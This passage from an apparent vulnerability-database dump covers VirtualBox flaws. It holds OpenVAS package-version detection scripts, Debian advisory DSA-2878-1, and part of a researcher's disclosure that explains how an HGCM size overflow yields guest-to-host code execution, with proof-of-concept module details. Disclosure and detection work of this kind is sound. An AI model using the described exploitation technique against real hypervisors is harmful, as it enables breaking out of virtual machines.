Daley discovered multiple vulnerabilities in VirtualBox, a x86\nvirtualisation solution, resulting in denial of service, privilege\nescalation and an information leak.", "cvss3": {}, "published": "2014-03-13T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2878-1 (virtualbox - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0404", "CVE-2014-0406", "CVE-2014-0407", "CVE-2013-5892"], "modified": "2017-07-17T00:00:00", "id": "OPENVAS:702878", "href": "http://plugins.openvas.org/nasl.php?oid=702878", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2878.nasl 6735 2017-07-17 09:56:49Z teissa $\n# Auto-generated from advisory DSA 2878-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_affected = \"virtualbox on Debian Linux\";\ntag_insight = \"VirtualBox is a free x86 virtualization solution allowing a wide range\nof x86 operating systems such as Windows, DOS, BSD or Linux to run on a\nLinux system.\";\ntag_solution = \"For the oldstable distribution (squeeze), these problems have been fixed in\nversion 3.2.10-dfsg-1+squeeze2 of the virtualbox-ose source package.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 4.1.18-dfsg-2+deb7u2.\n\nFor the testing distribution (jessie), these problems have been fixed in\nversion 4.3.6-dfsg-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 4.3.6-dfsg-1.\n\nWe recommend that you upgrade your virtualbox packages.\";\ntag_summary = \"Matthew Daley discovered multiple vulnerabilities in VirtualBox, a x86\nvirtualisation solution, resulting in denial of service, privilege\nescalation and an information leak.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(702878);\n script_version(\"$Revision: 6735 $\");\n script_cve_id(\"CVE-2013-5892\", \"CVE-2014-0404\", \"CVE-2014-0406\", \"CVE-2014-0407\");\n script_name(\"Debian Security Advisory DSA 2878-1 (virtualbox - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-17 11:56:49 +0200 (Mon, 17 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-03-13 00:00:00 +0100 (Thu, 13 Mar 2014)\");\n script_tag(name: \"cvss_base\", value:\"3.5\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:L/AC:H/Au:S/C:P/I:P/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-2878.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-dbg\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-dkms\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-fuse\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-dkms\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-source\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-utils\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-x11\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-qt\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-source\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-dbg\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-fuse\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-guest-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-guest-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-guest-utils\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-guest-x11\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-dbg\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-fuse\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-utils\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-x11\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-qt\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-qt\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-dbg\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-fuse\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-guest-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-guest-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-guest-utils\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-guest-x11\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-dbg\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-fuse\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-utils\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-x11\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-qt\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-qt\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-dbg\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-fuse\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-guest-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-guest-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-guest-utils\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-guest-x11\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-dbg\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-fuse\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-utils\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-x11\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-qt\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-qt\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-dbg\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-fuse\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-guest-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-guest-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-guest-utils\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-guest-x11\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-dbg\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-fuse\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-utils\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-x11\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-qt\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-qt\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 3.5, "vector": "AV:LOCAL/AC:HIGH/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:36:45", "description": "Gentoo Linux Local Security Checks GLSA 201401-13", "cvss3": {}, "published": "2015-09-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201401-13", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0405", "CVE-2014-0404", "CVE-2014-0406", "CVE-2014-0407", "CVE-2013-5892", "CVE-2012-3221"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310121110", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121110", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201401-13.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121110\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:26:34 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201401-13\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Virtualbox. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201401-13\");\n script_cve_id(\"CVE-2012-3221\", \"CVE-2013-5892\", \"CVE-2014-0404\", \"CVE-2014-0405\", \"CVE-2014-0406\", \"CVE-2014-0407\");\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201401-13\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"app-emulation/virtualbox\", unaffected: make_list(\"ge 4.2.22\"), vulnerable: make_list(\"lt 4.2.22\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-emulation/virtualbox-bin\", unaffected: make_list(\"ge 4.2.22\"), vulnerable: make_list(\"lt 4.2.22\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 3.5, "vector": "AV:L/AC:H/Au:S/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2021-10-21T23:18:59", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2878-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nMarch 13, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : virtualbox\nCVE ID : CVE-2013-5892 CVE-2014-0404 CVE-2014-0406 CVE-2014-0407\nDebian Bug : 735410\n\nMatthew Daley discovered multiple vulnerabilities in VirtualBox, a x86 \nvirtualisation solution, resulting in denial of service, privilege\nescalation and an information leak.\n\nFor the oldstable distribution (squeeze), these problems have been fixed in\nversion 3.2.10-dfsg-1+squeeze2 of the virtualbox-ose source package.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 4.1.18-dfsg-2+deb7u2.\n\nFor the testing distribution (jessie), these problems have been fixed in\nversion 4.3.6-dfsg-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 4.3.6-dfsg-1.\n\nWe recommend that you upgrade your virtualbox packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2014-03-13T15:31:43", "type": "debian", "title": "[SECURITY] [DSA 2878-1] virtualbox security update", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 1.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:L/AC:H/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5892", "CVE-2014-0404", "CVE-2014-0406", "CVE-2014-0407"], "modified": "2014-03-13T15:31:43", "id": "DEBIAN:DSA-2878-1:66F21", "href": "https://lists.debian.org/debian-security-announce/2014/msg00049.html", "cvss": {"score": 3.5, "vector": "AV:L/AC:H/Au:S/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:50", "description": "\r\n\r\nHi there,\r\n\r\nRecently I found a few vulnerabilities in Oracle VM VirtualBox, the\r\nopen-source virtualization product. These have already been reported to the\r\nproject, fixed and disclosed in the form of the recent January 2014 Oracle\r\nCritical Patch Update (at\r\n<http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html>).\r\n\r\nThe purpose of this mail is simply to provide a few more specifics about each\r\nvulnerability to allow distributors, packagers and other users of the software\r\nto better classify them (and, of course, for the sake of freely sharing\r\ninformation!)\r\n\r\n(Most of the rest of this message is a hacked-up version of the initial\r\nprivate disclosure to Oracle; please excuse any messed-up tenses or similar.\r\nAlso, I've tried to clarify any VBox-specific terminology but it still might\r\nbe lacking in places.)\r\n\r\n\r\nThese vulnerabilities were tested on both 32-bit and 64-bit versions of\r\nVirtualBox, namely:\r\n32-bit: 4.2.16_Debianr86992 ((what was) the current Debian jessie\r\n VirtualBox package)\r\n64-bit: 4.2.51_OSEr47061 (compiled from SVN)\r\nThe SVN trunk at the time was also inspected to ensure fixes hadn't been made\r\nsince these versions.\r\n\r\nThe exploitability of some of the vulnerabilities depends on the architectural\r\nwidth of the host; where this is the case it is explicitly mentioned. When an\r\nexploitation attempt is performed on a host not of the correct width the\r\nattempt usually leads to DOS instead.\r\n\r\nThe first two vulnerabilities are in the VMMDev device's HGCM interface, the\r\nthird is in the Windows Guest Additions' Shared Folder driver and the final\r\ntwo are in the handling of other VMMDev request types.\r\n\r\n\r\n* Vuln. #1: VMMDev HGCM argument size overflow (CVE-2013-5892)\r\n\r\nThe first step in processing a HGCM (Host-Guest Communication Manager) call\r\nVMMDev request is to calculate the total size of the call's arguments. This is\r\nso the correct amount of space can be allocated for the arguments whose types\r\n(linear in/out addresses and page lists) need buffer space for transferring\r\nbetween guest and host memory. This calculation is performed using the\r\n"cbCmdSize" variable.\r\n\r\nThe problem lies in the fact that this calculation can easily overflow and\r\nhence the check afterward to see whether the amount of space required is too\r\nlarge or not will mistakenly pass. This leads to a\r\nsmaller-than-actually-required amount of memory being allocated for the\r\nhost-side VBOXHGCMCMD structure. This structure holds host-side HGCM call\r\ninformation including information on each argument (type, pointer to host\r\nbuffer space, size) and the buffers themselves. This is obviously an\r\nexploitable heap overflow, but we can do better.\r\n\r\nThe aforementioned host-side buffer pointers which are then assigned to the\r\narguments which need them can, via careful argument size choice, be lead to\r\npoint to arbitrary host memory instead of within the third part of the\r\nVBOXHGCMCMD structure where they are supposed to point.\r\n\r\nNotably, one can craft the individual argument sizes so that the buffer\r\npointer placement routine wraps around the address space and sets the buffers\r\nto point to the head of the VBOXHGCMCMD structure, allowing one to cleanly\r\nwrite to the other parts of the structure, including the other argument types\r\nand host-side buffer pointers.\r\n\r\nUsing this, one can write to one of these host-side buffer pointers so that\r\nthe resulting HGCM call output for that argument is sent elsewhere in the\r\naddress space - a write-(almost-)what-where vulnerability of arbitrary length\r\nwhich is not affected by the heap/ASLR moving the HGCM structure around in\r\nmemory (since the method of exploitation uses distances relative to the head\r\nof the HGCM structure itself).\r\n\r\nThis can be exploited to allow host ring 3 code execution from guest ring 0\r\n(assuming a guest IOPL of 0). A POC exploit in the form of a Linux kernel\r\nmodule which takes "addr" and "val" arguments to specify where and what to\r\nwrite into host ring 3 memory was created (and sent in the full report):\r\nmattd@debian:~$ /sbin/modinfo vmmdev_vuln_oflow.ko\r\nfilename: /home/mattd/vmmdev_vuln_oflow.ko\r\nlicense: Dual BSD/GPL\r\ndepends:\r\nvermagic: 3.2.0-4-486 mod_unload modversions 486\r\nparm: addr:Host-ring3 address to write to (ulong)\r\nparm: val:Value to write (UTF-8 hex) (string)\r\n\r\nHere is an example exploitation session:\r\n\r\n- Start a VM\r\n$ VBoxManage startvm foo4 --type headless\r\nWaiting for VM "foo4" to power on...\r\nVM "foo4" has been successfully started.\r\n\r\n- Demonstrate that there is 